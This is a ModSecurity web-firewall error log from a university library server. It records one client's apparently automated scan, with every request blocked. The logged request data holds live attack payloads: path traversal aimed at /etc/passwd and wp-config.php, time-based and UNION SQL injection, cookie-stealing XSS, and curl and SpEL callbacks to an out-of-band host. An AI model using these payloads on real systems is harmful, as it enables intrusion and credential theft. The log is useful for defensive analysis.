[Tue Aug 29 11:38:34.431307 2023] [:error] [pid 1549] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAYNhBUAAAAZ"]
[Tue Aug 29 11:38:34.509612 2023] [:error] [pid 1510] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26g77ip556513au7.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAAXm8AQAAAAW"]
[Tue Aug 29 11:38:35.361190 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAXwLIAAAAAe"]
[Tue Aug 29 11:38:46.365429 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAUFduYAAAA9"]
[Tue Aug 29 11:38:47.363356 2023] [:error] [pid 1566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAYelUQAAAAV"]
[Tue Aug 29 11:38:47.364969 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAAYculgAAAAN"]
[Tue Aug 29 11:38:56.479590 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYcuncAAAAN"]
[Tue Aug 29 11:38:57.385204 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAYlCJwAAAAP"]
[Tue Aug 29 11:38:57.404916 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYb5uIAAAAI"]
[Tue Aug 29 11:39:06.628483 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAYcup0AAAAN"]
[Tue Aug 29 11:39:07.093267 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYWXbQAAAAF"]
[Tue Aug 29 11:39:11.840255 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12b8Co-f0AAAXbcAcAAAAL"]
[Tue Aug 29 11:39:12.266368 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAXA9oMAAAAO"]
[Tue Aug 29 11:39:12.550858 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAaJJsIAAAAJ"]
[Tue Aug 29 11:39:12.991195 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO12cMCo-f0AAAYh9U8AAAAK"]
[Tue Aug 29 11:39:18.649704 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAXA9pIAAAAO"]
[Tue Aug 29 11:39:23.469413 2023] [:error] [pid 1702] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAamasMAAAAt"]
[Tue Aug 29 11:39:36.531850 2023] [:error] [pid 1777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAbx29oAAAAQ"]
[Tue Aug 29 11:39:48.027126 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAXQKIcAAAAj"]
[Tue Aug 29 11:39:56.389588 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAXA9uEAAAAO"]
[Tue Aug 29 11:40:01.411450 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gw49bss9n5y4c9.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12ocCo-f0AAAcYUzcAAAAp"]
[Tue Aug 29 11:40:07.380344 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAaJJ24AAAAJ"]
[Tue Aug 29 11:40:07.384329 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO12p8Co-f0AAAcjAgsAAAAw"]
[Tue Aug 29 11:40:07.396783 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAcVJPUAAAAB"]
[Tue Aug 29 11:40:12.444784 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAaJJ3QAAAAJ"]
[Tue Aug 29 11:40:21.463006 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAaXqvgAAAAl"]
[Tue Aug 29 11:40:22.660033 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAcjAhwAAAAw"]
[Tue Aug 29 11:40:32.434686 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAaJJ6IAAAAJ"]
[Tue Aug 29 11:40:33.413176 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcjAjUAAAAw"]
[Tue Aug 29 11:40:36.470826 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAQSWmcAAAA0"]
[Tue Aug 29 11:40:37.388628 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAcbR-UAAAAv"]
[Tue Aug 29 11:40:39.538820 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAYf-H8AAAAD"]
[Tue Aug 29 11:40:40.380259 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAaHMe4AAAAE"]
[Tue Aug 29 11:40:44.447516 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id 